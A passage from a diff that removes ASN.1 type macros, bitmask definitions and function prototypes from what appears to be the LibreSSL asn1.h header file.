-		ASN1_STRING_type_new(V_ASN1_ENUMERATED)
-#define M_ASN1_ENUMERATED_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_ENUMERATED_dup(a) (ASN1_ENUMERATED *)\
-		ASN1_STRING_dup((const ASN1_STRING *)a)
-#define M_ASN1_ENUMERATED_cmp(a,b)	ASN1_STRING_cmp(\
-		(const ASN1_STRING *)a,(const ASN1_STRING *)b)
-
-#define M_ASN1_OCTET_STRING_new()	(ASN1_OCTET_STRING *)\
-		ASN1_STRING_type_new(V_ASN1_OCTET_STRING)
-#define M_ASN1_OCTET_STRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_OCTET_STRING_dup(a) (ASN1_OCTET_STRING *)\
-		ASN1_STRING_dup((const ASN1_STRING *)a)
-#define M_ASN1_OCTET_STRING_cmp(a,b) ASN1_STRING_cmp(\
-		(const ASN1_STRING *)a,(const ASN1_STRING *)b)
-#define M_ASN1_OCTET_STRING_set(a,b,c)	ASN1_STRING_set((ASN1_STRING *)a,b,c)
-#define M_ASN1_OCTET_STRING_print(a,b)	ASN1_STRING_print(a,(ASN1_STRING *)b)
-#define M_i2d_ASN1_OCTET_STRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_OCTET_STRING,\
-		V_ASN1_UNIVERSAL)
-
-#define M_ASN1_PRINTABLE_new()	ASN1_STRING_type_new(V_ASN1_T61STRING)
-#define M_ASN1_PRINTABLE_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_PRINTABLE(a,pp) i2d_ASN1_bytes((ASN1_STRING *)a,\
-		pp,a->type,V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_PRINTABLE(a,pp,l) \
-		d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l, \
-			B_ASN1_PRINTABLE)
-
-#define M_DIRECTORYSTRING_new() ASN1_STRING_type_new(V_ASN1_PRINTABLESTRING)
-#define M_DIRECTORYSTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_DIRECTORYSTRING(a,pp) i2d_ASN1_bytes((ASN1_STRING *)a,\
-						pp,a->type,V_ASN1_UNIVERSAL)
-#define M_d2i_DIRECTORYSTRING(a,pp,l) \
-		d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l, \
-			B_ASN1_DIRECTORYSTRING)
-
-#define M_DISPLAYTEXT_new() ASN1_STRING_type_new(V_ASN1_VISIBLESTRING)
-#define M_DISPLAYTEXT_free(a) ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_DISPLAYTEXT(a,pp) i2d_ASN1_bytes((ASN1_STRING *)a,\
-						pp,a->type,V_ASN1_UNIVERSAL)
-#define M_d2i_DISPLAYTEXT(a,pp,l) \
-		d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l, \
-			B_ASN1_DISPLAYTEXT)
-
-#define M_ASN1_PRINTABLESTRING_new() (ASN1_PRINTABLESTRING *)\
-		ASN1_STRING_type_new(V_ASN1_PRINTABLESTRING)
-#define M_ASN1_PRINTABLESTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_PRINTABLESTRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_PRINTABLESTRING,\
-		V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_PRINTABLESTRING(a,pp,l) \
-		(ASN1_PRINTABLESTRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_PRINTABLESTRING)
-
-#define M_ASN1_T61STRING_new()	(ASN1_T61STRING *)\
-		ASN1_STRING_type_new(V_ASN1_T61STRING)
-#define M_ASN1_T61STRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_T61STRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_T61STRING,\
-		V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_T61STRING(a,pp,l) \
-		(ASN1_T61STRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_T61STRING)
-
-#define M_ASN1_IA5STRING_new()	(ASN1_IA5STRING *)\
-		ASN1_STRING_type_new(V_ASN1_IA5STRING)
-#define M_ASN1_IA5STRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_IA5STRING_dup(a)	\
-		(ASN1_IA5STRING *)ASN1_STRING_dup((const ASN1_STRING *)a)
-#define M_i2d_ASN1_IA5STRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_IA5STRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_IA5STRING(a,pp,l) \
-		(ASN1_IA5STRING *)d2i_ASN1_type_bytes((ASN1_STRING **)a,pp,l,\
-			B_ASN1_IA5STRING)
-
-#define M_ASN1_UTCTIME_new()	(ASN1_UTCTIME *)\
-		ASN1_STRING_type_new(V_ASN1_UTCTIME)
-#define M_ASN1_UTCTIME_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_UTCTIME_dup(a) (ASN1_UTCTIME *)\
-		ASN1_STRING_dup((const ASN1_STRING *)a)
-
-#define M_ASN1_GENERALIZEDTIME_new()	(ASN1_GENERALIZEDTIME *)\
-		ASN1_STRING_type_new(V_ASN1_GENERALIZEDTIME)
-#define M_ASN1_GENERALIZEDTIME_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_GENERALIZEDTIME_dup(a) (ASN1_GENERALIZEDTIME *)ASN1_STRING_dup(\
-	(const ASN1_STRING *)a)
-
-#define M_ASN1_TIME_new()	(ASN1_TIME *)\
-		ASN1_STRING_type_new(V_ASN1_UTCTIME)
-#define M_ASN1_TIME_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_TIME_dup(a) (ASN1_TIME *)\
-	ASN1_STRING_dup((const ASN1_STRING *)a)
-
-#define M_ASN1_GENERALSTRING_new()	(ASN1_GENERALSTRING *)\
-		ASN1_STRING_type_new(V_ASN1_GENERALSTRING)
-#define M_ASN1_GENERALSTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_GENERALSTRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_GENERALSTRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_GENERALSTRING(a,pp,l) \
-		(ASN1_GENERALSTRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_GENERALSTRING)
-
-#define M_ASN1_UNIVERSALSTRING_new()	(ASN1_UNIVERSALSTRING *)\
-		ASN1_STRING_type_new(V_ASN1_UNIVERSALSTRING)
-#define M_ASN1_UNIVERSALSTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_UNIVERSALSTRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_UNIVERSALSTRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_UNIVERSALSTRING(a,pp,l) \
-		(ASN1_UNIVERSALSTRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_UNIVERSALSTRING)
-
-#define M_ASN1_BMPSTRING_new()	(ASN1_BMPSTRING *)\
-		ASN1_STRING_type_new(V_ASN1_BMPSTRING)
-#define M_ASN1_BMPSTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_BMPSTRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_BMPSTRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_BMPSTRING(a,pp,l) \
-		(ASN1_BMPSTRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_BMPSTRING)
-
-#define M_ASN1_VISIBLESTRING_new()	(ASN1_VISIBLESTRING *)\
-		ASN1_STRING_type_new(V_ASN1_VISIBLESTRING)
-#define M_ASN1_VISIBLESTRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_VISIBLESTRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_VISIBLESTRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_VISIBLESTRING(a,pp,l) \
-		(ASN1_VISIBLESTRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_VISIBLESTRING)
-
-#define M_ASN1_UTF8STRING_new()	(ASN1_UTF8STRING *)\
-		ASN1_STRING_type_new(V_ASN1_UTF8STRING)
-#define M_ASN1_UTF8STRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_i2d_ASN1_UTF8STRING(a,pp) \
-		i2d_ASN1_bytes((ASN1_STRING *)a,pp,V_ASN1_UTF8STRING,\
-			V_ASN1_UNIVERSAL)
-#define M_d2i_ASN1_UTF8STRING(a,pp,l) \
-		(ASN1_UTF8STRING *)d2i_ASN1_type_bytes\
-		((ASN1_STRING **)a,pp,l,B_ASN1_UTF8STRING)
-
-#endif /* !LIBRESSL_INTERNAL */
-
-#define B_ASN1_TIME \
-			B_ASN1_UTCTIME | \
-			B_ASN1_GENERALIZEDTIME
-
-#define B_ASN1_PRINTABLE \
-			B_ASN1_NUMERICSTRING| \
-			B_ASN1_PRINTABLESTRING| \
-			B_ASN1_T61STRING| \
-			B_ASN1_IA5STRING| \
-			B_ASN1_BIT_STRING| \
-			B_ASN1_UNIVERSALSTRING|\
-			B_ASN1_BMPSTRING|\
-			B_ASN1_UTF8STRING|\
-			B_ASN1_SEQUENCE|\
-			B_ASN1_UNKNOWN
-
-#define B_ASN1_DIRECTORYSTRING \
-			B_ASN1_PRINTABLESTRING| \
-			B_ASN1_TELETEXSTRING|\
-			B_ASN1_BMPSTRING|\
-			B_ASN1_UNIVERSALSTRING|\
-			B_ASN1_UTF8STRING
-
-#define B_ASN1_DISPLAYTEXT \
-			B_ASN1_IA5STRING| \
-			B_ASN1_VISIBLESTRING| \
-			B_ASN1_BMPSTRING|\
-			B_ASN1_UTF8STRING
-
-/* for the is_set parameter to i2d_ASN1_SET */
-#define IS_SEQUENCE	0
-#define IS_SET		1
-
-ASN1_TYPE *ASN1_TYPE_new(void);
-void ASN1_TYPE_free(ASN1_TYPE *a);
-ASN1_TYPE *d2i_ASN1_TYPE(ASN1_TYPE **a, const unsigned char **in, long len);
-int i2d_ASN1_TYPE(ASN1_TYPE *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_ANY_it;
-
-int ASN1_TYPE_get(ASN1_TYPE *a);
-void ASN1_TYPE_set(ASN1_TYPE *a, int type, void *value);
-int ASN1_TYPE_set1(ASN1_TYPE *a, int type, const void *value);
-int ASN1_TYPE_cmp(ASN1_TYPE *a, ASN1_TYPE *b);
-
-ASN1_OBJECT *ASN1_OBJECT_new(void );
-void ASN1_OBJECT_free(ASN1_OBJECT *a);
-int i2d_ASN1_OBJECT(ASN1_OBJECT *a, unsigned char **pp);
-ASN1_OBJECT *c2i_ASN1_OBJECT(ASN1_OBJECT **a, const unsigned char **pp,
-    long length);
-ASN1_OBJECT *d2i_ASN1_OBJECT(ASN1_OBJECT **a, const unsigned char **pp,
-    long length);
-
-extern const ASN1_ITEM ASN1_OBJECT_it;
-
-DECLARE_STACK_OF(ASN1_OBJECT)
-
-ASN1_STRING *ASN1_STRING_new(void);
-void ASN1_STRING_free(ASN1_STRING *a);
-int ASN1_STRING_copy(ASN1_STRING *dst, const ASN1_STRING *str);
-ASN1_STRING *ASN1_STRING_dup(const ASN1_STRING *a);
-ASN1_STRING *ASN1_STRING_type_new(int type );
-int ASN1_STRING_cmp(const ASN1_STRING *a, const ASN1_STRING *b);
-  /* Since this is used to store all sorts of things, via macros, for now, make
-     its data void * */
-int ASN1_STRING_set(ASN1_STRING *str, const void *data, int len);
-void ASN1_STRING_set0(ASN1_STRING *str, void *data, int len);
-int ASN1_STRING_length(const ASN1_STRING *x);
-void ASN1_STRING_length_set(ASN1_STRING *x, int n);
-int ASN1_STRING_type(ASN1_STRING *x);
-unsigned char * ASN1_STRING_data(ASN1_STRING *x);
-
-ASN1_BIT_STRING *ASN1_BIT_STRING_new(void);
-void ASN1_BIT_STRING_free(ASN1_BIT_STRING *a);
-ASN1_BIT_STRING *d2i_ASN1_BIT_STRING(ASN1_BIT_STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_BIT_STRING(ASN1_BIT_STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_BIT_STRING_it;
-int i2c_ASN1_BIT_STRING(ASN1_BIT_STRING *a, unsigned char **pp);
-ASN1_BIT_STRING *c2i_ASN1_BIT_STRING(ASN1_BIT_STRING **a,
-    const unsigned char **pp, long length);
-int ASN1_BIT_STRING_set(ASN1_BIT_STRING *a, unsigned char *d, int length );
-int ASN1_BIT_STRING_set_bit(ASN1_BIT_STRING *a, int n, int value);
-int ASN1_BIT_STRING_get_bit(ASN1_BIT_STRING *a, int n);
-int ASN1_BIT_STRING_check(ASN1_BIT_STRING *a,
-    unsigned char *flags, int flags_len);
-
-#ifndef OPENSSL_NO_BIO
-int ASN1_BIT_STRING_name_print(BIO *out, ASN1_BIT_STRING *bs,
-    BIT_STRING_BITNAME *tbl, int indent);
-#endif
-int ASN1_BIT_STRING_num_asc(char *name, BIT_STRING_BITNAME *tbl);
-int ASN1_BIT_STRING_set_asc(ASN1_BIT_STRING *bs, char *name, int value,
-    BIT_STRING_BITNAME *tbl);
-
-int i2d_ASN1_BOOLEAN(int a, unsigned char **pp);
-int d2i_ASN1_BOOLEAN(int *a, const unsigned char **pp, long length);
-
-ASN1_INTEGER *ASN1_INTEGER_new(void);
-void ASN1_INTEGER_free(ASN1_INTEGER *a);
-ASN1_INTEGER *d2i_ASN1_INTEGER(ASN1_INTEGER **a, const unsigned char **in, long len);
-int i2d_ASN1_INTEGER(ASN1_INTEGER *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_INTEGER_it;
-int i2c_ASN1_INTEGER(ASN1_INTEGER *a, unsigned char **pp);
-ASN1_INTEGER *c2i_ASN1_INTEGER(ASN1_INTEGER **a, const unsigned char **pp,
-    long length);
-ASN1_INTEGER *d2i_ASN1_UINTEGER(ASN1_INTEGER **a, const unsigned char **pp,
-    long length);
-ASN1_INTEGER *	ASN1_INTEGER_dup(const ASN1_INTEGER *x);
-int ASN1_INTEGER_cmp(const ASN1_INTEGER *x, const ASN1_INTEGER *y);
-
-ASN1_ENUMERATED *ASN1_ENUMERATED_new(void);
-void ASN1_ENUMERATED_free(ASN1_ENUMERATED *a);
-ASN1_ENUMERATED *d2i_ASN1_ENUMERATED(ASN1_ENUMERATED **a, const unsigned char **in, long len);
-int i2d_ASN1_ENUMERATED(ASN1_ENUMERATED *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_ENUMERATED_it;
-
-int ASN1_UTCTIME_check(ASN1_UTCTIME *a);
-ASN1_UTCTIME *ASN1_UTCTIME_set(ASN1_UTCTIME *s, time_t t);
-ASN1_UTCTIME *ASN1_UTCTIME_adj(ASN1_UTCTIME *s, time_t t,
-    int offset_day, long offset_sec);
-int ASN1_UTCTIME_set_string(ASN1_UTCTIME *s, const char *str);
-
-#ifndef LIBRESSL_INTERNAL
-int ASN1_UTCTIME_cmp_time_t(const ASN1_UTCTIME *s, time_t t);
-#endif /* !LIBRESSL_INTERNAL */
-
-int ASN1_GENERALIZEDTIME_check(ASN1_GENERALIZEDTIME *a);
-ASN1_GENERALIZEDTIME *ASN1_GENERALIZEDTIME_set(ASN1_GENERALIZEDTIME *s,
-    time_t t);
-ASN1_GENERALIZEDTIME *ASN1_GENERALIZEDTIME_adj(ASN1_GENERALIZEDTIME *s,
-    time_t t, int offset_day, long offset_sec);
-int ASN1_GENERALIZEDTIME_set_string(ASN1_GENERALIZEDTIME *s, const char *str);
-
-ASN1_OCTET_STRING *ASN1_OCTET_STRING_new(void);
-void ASN1_OCTET_STRING_free(ASN1_OCTET_STRING *a);
-ASN1_OCTET_STRING *d2i_ASN1_OCTET_STRING(ASN1_OCTET_STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_OCTET_STRING(ASN1_OCTET_STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_OCTET_STRING_it;
-ASN1_OCTET_STRING *ASN1_OCTET_STRING_dup(const ASN1_OCTET_STRING *a);
-int ASN1_OCTET_STRING_cmp(const ASN1_OCTET_STRING *a,
-    const ASN1_OCTET_STRING *b);
-int ASN1_OCTET_STRING_set(ASN1_OCTET_STRING *str, const unsigned char *data,
-    int len);
-
-ASN1_VISIBLESTRING *ASN1_VISIBLESTRING_new(void);
-void ASN1_VISIBLESTRING_free(ASN1_VISIBLESTRING *a);
-ASN1_VISIBLESTRING *d2i_ASN1_VISIBLESTRING(ASN1_VISIBLESTRING **a, const unsigned char **in, long len);
-int i2d_ASN1_VISIBLESTRING(ASN1_VISIBLESTRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_VISIBLESTRING_it;
-ASN1_UNIVERSALSTRING *ASN1_UNIVERSALSTRING_new(void);
-void ASN1_UNIVERSALSTRING_free(ASN1_UNIVERSALSTRING *a);
-ASN1_UNIVERSALSTRING *d2i_ASN1_UNIVERSALSTRING(ASN1_UNIVERSALSTRING **a, const unsigned char **in, long len);
-int i2d_ASN1_UNIVERSALSTRING(ASN1_UNIVERSALSTRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_UNIVERSALSTRING_it;
-ASN1_UTF8STRING *ASN1_UTF8STRING_new(void);
-void ASN1_UTF8STRING_free(ASN1_UTF8STRING *a);
-ASN1_UTF8STRING *d2i_ASN1_UTF8STRING(ASN1_UTF8STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_UTF8STRING(ASN1_UTF8STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_UTF8STRING_it;
-ASN1_NULL *ASN1_NULL_new(void);
-void ASN1_NULL_free(ASN1_NULL *a);
-ASN1_NULL *d2i_ASN1_NULL(ASN1_NULL **a, const unsigned char **in, long len);
-int i2d_ASN1_NULL(ASN1_NULL *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_NULL_it;
-ASN1_BMPSTRING *ASN1_BMPSTRING_new(void);
-void ASN1_BMPSTRING_free(ASN1_BMPSTRING *a);
-ASN1_BMPSTRING *d2i_ASN1_BMPSTRING(ASN1_BMPSTRING **a, const unsigned char **in, long len);
-int i2d_ASN1_BMPSTRING(ASN1_BMPSTRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_BMPSTRING_it;
-
-ASN1_STRING *ASN1_PRINTABLE_new(void);
-void ASN1_PRINTABLE_free(ASN1_STRING *a);
-ASN1_STRING *d2i_ASN1_PRINTABLE(ASN1_STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_PRINTABLE(ASN1_STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_PRINTABLE_it;
-
-ASN1_STRING *DIRECTORYSTRING_new(void);
-void DIRECTORYSTRING_free(ASN1_STRING *a);
-ASN1_STRING *d2i_DIRECTORYSTRING(ASN1_STRING **a, const unsigned char **in, long len);
-int i2d_DIRECTORYSTRING(ASN1_STRING *a, unsigned char **out);
-extern const ASN1_ITEM DIRECTORYSTRING_it;
-ASN1_STRING *DISPLAYTEXT_new(void);
-void DISPLAYTEXT_free(ASN1_STRING *a);
-ASN1_STRING *d2i_DISPLAYTEXT(ASN1_STRING **a, const unsigned char **in, long len);
-int i2d_DISPLAYTEXT(ASN1_STRING *a, unsigned char **out);
-extern const ASN1_ITEM DISPLAYTEXT_it;
-ASN1_PRINTABLESTRING *ASN1_PRINTABLESTRING_new(void);
-void ASN1_PRINTABLESTRING_free(ASN1_PRINTABLESTRING *a);
-ASN1_PRINTABLESTRING *d2i_ASN1_PRINTABLESTRING(ASN1_PRINTABLESTRING **a, const unsigned char **in, long len);
-int i2d_ASN1_PRINTABLESTRING(ASN1_PRINTABLESTRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_PRINTABLESTRING_it;
-ASN1_T61STRING *ASN1_T61STRING_new(void);
-void ASN1_T61STRING_free(ASN1_T61STRING *a);
-ASN1_T61STRING *d2i_ASN1_T61STRING(ASN1_T61STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_T61STRING(ASN1_T61STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_T61STRING_it;
-ASN1_IA5STRING *ASN1_IA5STRING_new(void);
-void ASN1_IA5STRING_free(ASN1_IA5STRING *a);
-ASN1_IA5STRING *d2i_ASN1_IA5STRING(ASN1_IA5STRING **a, const unsigned char **in, long len);
-int i2d_ASN1_IA5STRING(ASN1_IA5STRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_IA5STRING_it;
-ASN1_GENERALSTRING *ASN1_GENERALSTRING_new(void);
-void ASN1_GENERALSTRING_free(ASN1_GENERALSTRING *a);
-ASN1_GENERALSTRING *d2i_ASN1_GENERALSTRING(ASN1_GENERALSTRING **a, const unsigned char **in, long len);
-int i2d_ASN1_GENERALSTRING(ASN1_GENERALSTRING *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_GENERALSTRING_it;
-ASN1_UTCTIME *ASN1_UTCTIME_new(void);
-void ASN1_UTCTIME_free(ASN1_UTCTIME *a);
-ASN1_UTCTIME *d2i_ASN1_UTCTIME(ASN1_UTCTIME **a, const unsigned char **in, long len);
-int i2d_ASN1_UTCTIME(ASN1_UTCTIME *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_UTCTIME_it;
-ASN1_GENERALIZEDTIME *ASN1_GENERALIZEDTIME_new(void);
-void ASN1_GENERALIZEDTIME_free(ASN1_GENERALIZEDTIME *a);
-ASN1_GENERALIZEDTIME *d2i_ASN1_GENERALIZEDTIME(ASN1_GENERALIZEDTIME **a, const unsigned char **in, long len);
-int i2d_ASN1_GENERALIZEDTIME(ASN1_GENERALIZEDTIME *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_GENERALIZEDTIME_it;
-ASN1_TIME *ASN1_TIME_new(void);
-void ASN1_TIME_free(ASN1_TIME *a);
-ASN1_TIME *d2i_ASN1_TIME(ASN1_TIME **a, const unsigned char **in, long len);
-int i2d_ASN1_TIME(ASN1_TIME *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_TIME_it;
-
-extern const ASN1_ITEM ASN1_OCTET_STRING_NDEF_it;
-
-ASN1_TIME *ASN1_TIME_set(ASN1_TIME *s, time_t t);
-ASN1_TIME *ASN1_TIME_set_tm(ASN1_TIME *s, struct tm *tm);
-ASN1_TIME *ASN1_TIME_adj(ASN1_TIME *s, time_t t, int offset_day,
-    long offset_sec);
-int ASN1_TIME_check(ASN1_TIME *t);
-ASN1_GENERALIZEDTIME *ASN1_TIME_to_generalizedtime(ASN1_TIME *t,
-    ASN1_GENERALIZEDTIME **out);
-int ASN1_TIME_set_string(ASN1_TIME *s, const char *str);
-
-int i2d_ASN1_SET(STACK_OF(OPENSSL_BLOCK) *a, unsigned char **pp,
-    i2d_of_void *i2d, int ex_tag, int ex_class, int is_set);
-STACK_OF(OPENSSL_BLOCK) *d2i_ASN1_SET(STACK_OF(OPENSSL_BLOCK) **a,
-    const unsigned char **pp, long length, d2i_of_void *d2i,
-    void (*free_func)(OPENSSL_BLOCK), int ex_tag, int ex_class);
-
-#ifndef OPENSSL_NO_BIO
-int i2a_ASN1_INTEGER(BIO *bp, ASN1_INTEGER *a);
-int a2i_ASN1_INTEGER(BIO *bp, ASN1_INTEGER *bs, char *buf, int size);
-int i2a_ASN1_ENUMERATED(BIO *bp, ASN1_ENUMERATED *a);
-int a2i_ASN1_ENUMERATED(BIO *bp, ASN1_ENUMERATED *bs, char *buf, int size);
-int i2a_ASN1_OBJECT(BIO *bp, ASN1_OBJECT *a);
-int a2i_ASN1_STRING(BIO *bp, ASN1_STRING *bs, char *buf, int size);
-int i2a_ASN1_STRING(BIO *bp, ASN1_STRING *a, int type);
-#endif
-int i2t_ASN1_OBJECT(char *buf, int buf_len, ASN1_OBJECT *a);
-
-int a2d_ASN1_OBJECT(unsigned char *out, int olen, const char *buf, int num);
-ASN1_OBJECT *ASN1_OBJECT_create(int nid, unsigned char *data, int len,
-    const char *sn, const char *ln);
-
-int ASN1_INTEGER_set(ASN1_INTEGER *a, long v);
-long ASN1_INTEGER_get(const ASN1_INTEGER *a);
-ASN1_INTEGER *BN_to_ASN1_INTEGER(const BIGNUM *bn, ASN1_INTEGER *ai);
-BIGNUM *ASN1_INTEGER_to_BN(const ASN1_INTEGER *ai, BIGNUM *bn);
-
-int ASN1_ENUMERATED_set(ASN1_ENUMERATED *a, long v);
-long ASN1_ENUMERATED_get(ASN1_ENUMERATED *a);
-ASN1_ENUMERATED *BN_to_ASN1_ENUMERATED(BIGNUM *bn, ASN1_ENUMERATED *ai);
-BIGNUM *ASN1_ENUMERATED_to_BN(ASN1_ENUMERATED *ai, BIGNUM *bn);
-
-/* General */
-/* given a string, return the correct type, max is the maximum length */
-int ASN1_PRINTABLE_type(const unsigned char *s, int max);
-
-int i2d_ASN1_bytes(ASN1_STRING *a, unsigned char **pp, int tag, int xclass);
-ASN1_STRING *d2i_ASN1_bytes(ASN1_STRING **a, const unsigned char **pp,
-    long length, int Ptag, int Pclass);
-unsigned long ASN1_tag2bit(int tag);
-/* type is one or more of the B_ASN1_ values. */
-ASN1_STRING *d2i_ASN1_type_bytes(ASN1_STRING **a, const unsigned char **pp,
-    long length, int type);
-
-/* PARSING */
-int asn1_Finish(ASN1_CTX *c);
-int asn1_const_Finish(ASN1_const_CTX *c);
-
-/* SPECIALS */
-int ASN1_get_object(const unsigned char **pp, long *plength, int *ptag,
-    int *pclass, long omax);
-int ASN1_check_infinite_end(unsigned char **p, long len);
-int ASN1_const_check_infinite_end(const unsigned char **p, long len);
-void ASN1_put_object(unsigned char **pp, int constructed, int length, int tag,
-    int xclass);
-int ASN1_put_eoc(unsigned char **pp);
-int ASN1_object_size(int constructed, int length, int tag);
-
-void *ASN1_item_dup(const ASN1_ITEM *it, void *x);
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Used to implement other functions */
-void *ASN1_dup(i2d_of_void *i2d, d2i_of_void *d2i, void *x);
-
-#define ASN1_dup_of(type,i2d,d2i,x) \
-    ((type*)ASN1_dup(CHECKED_I2D_OF(type, i2d), \
-		     CHECKED_D2I_OF(type, d2i), \
-		     CHECKED_PTR_OF(type, x)))
-
-#define ASN1_dup_of_const(type,i2d,d2i,x) \
-    ((type*)ASN1_dup(CHECKED_I2D_OF(const type, i2d), \
-		     CHECKED_D2I_OF(type, d2i), \
-		     CHECKED_PTR_OF(const type, x)))
-
-/* ASN1 alloc/free macros for when a type is only used internally */
-
-#define M_ASN1_new_of(type) (type *)ASN1_item_new(ASN1_ITEM_rptr(type))
-#define M_ASN1_free_of(x, type) \
-		ASN1_item_free(CHECKED_PTR_OF(type, x), ASN1_ITEM_rptr(type))
-
-#endif /* !LIBRESSL_INTERNAL */
-
-void *ASN1_d2i_fp(void *(*xnew)(void), d2i_of_void *d2i, FILE *in, void **x);
-
-#define ASN1_d2i_fp_of(type,xnew,d2i,in,x) \
-    ((type*)ASN1_d2i_fp(CHECKED_NEW_OF(type, xnew), \
-			CHECKED_D2I_OF(type, d2i), \
-			in, \
-			CHECKED_PPTR_OF(type, x)))
-
-void *ASN1_item_d2i_fp(const ASN1_ITEM *it, FILE *in, void *x);
-int ASN1_i2d_fp(i2d_of_void *i2d, FILE *out, void *x);
-
-#define ASN1_i2d_fp_of(type,i2d,out,x) \
-    (ASN1_i2d_fp(CHECKED_I2D_OF(type, i2d), \
-		 out, \
-		 CHECKED_PTR_OF(type, x)))
-
-#define ASN1_i2d_fp_of_const(type,i2d,out,x) \
-    (ASN1_i2d_fp(CHECKED_I2D_OF(const type, i2d), \
-		 out, \
-		 CHECKED_PTR_OF(const type, x)))
-
-int ASN1_item_i2d_fp(const ASN1_ITEM *it, FILE *out, void *x);
-int ASN1_STRING_print_ex_fp(FILE *fp, ASN1_STRING *str, unsigned long flags);
-
-int ASN1_STRING_to_UTF8(unsigned char **out, ASN1_STRING *in);
-
-#ifndef OPENSSL_NO_BIO
-void *ASN1_d2i_bio(void *(*xnew)(void), d2i_of_void *d2i, BIO *in, void **x);
-
-#define ASN1_d2i_bio_of(type,xnew,d2i,in,x) \
-    ((type*)ASN1_d2i_bio( CHECKED_NEW_OF(type, xnew), \
-			  CHECKED_D2I_OF(type, d2i), \
-			  in, \
-			  CHECKED_PPTR_OF(type, x)))
-
-void *ASN1_item_d2i_bio(const ASN1_ITEM *it, BIO *in, void *x);
-int ASN1_i2d_bio(i2d_of_void *i2d, BIO *out, unsigned char *x);
-
-#define ASN1_i2d_bio_of(type,i2d,out,x) \
-    (ASN1_i2d_bio(CHECKED_I2D_OF(type, i2d), \
-		  out, \
-		  CHECKED_PTR_OF(type, x)))
-
-#define ASN1_i2d_bio_of_const(type,i2d,out,x) \
-    (ASN1_i2d_bio(CHECKED_I2D_OF(const type, i2d), \
-		  out, \
-		  CHECKED_PTR_OF(const type, x)))
-
-int ASN1_item_i2d_bio(const ASN1_ITEM *it, BIO *out, void *x);
-int ASN1_UTCTIME_print(BIO *fp, const ASN1_UTCTIME *a);
-int ASN1_GENERALIZEDTIME_print(BIO *fp, const ASN1_GENERALIZEDTIME *a);
-int ASN1_TIME_print(BIO *fp, const ASN1_TIME *a);
-int ASN1_STRING_print(BIO *bp, const ASN1_STRING *v);
